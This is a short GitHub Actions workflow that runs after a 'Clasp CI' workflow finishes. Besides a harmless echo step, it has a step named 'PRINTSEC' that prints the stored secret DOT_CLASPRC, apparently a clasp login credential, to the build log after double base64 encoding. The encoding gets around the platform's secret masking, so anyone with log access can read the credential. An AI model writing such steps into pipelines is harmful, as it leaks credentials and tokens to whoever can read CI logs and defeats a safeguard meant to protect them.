name: Second Workflow

on:
  workflow_run:
    workflows: ["Clasp CI"]
    types:
      - completed

jobs:
  run_after_first_workflow:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Run after the first workflow
        run: echo "The first workflow is completed!"

      - name: PRINTSEC
        run: |
          echo ${{ secrets.DOT_CLASPRC }} | base64 | base64
 
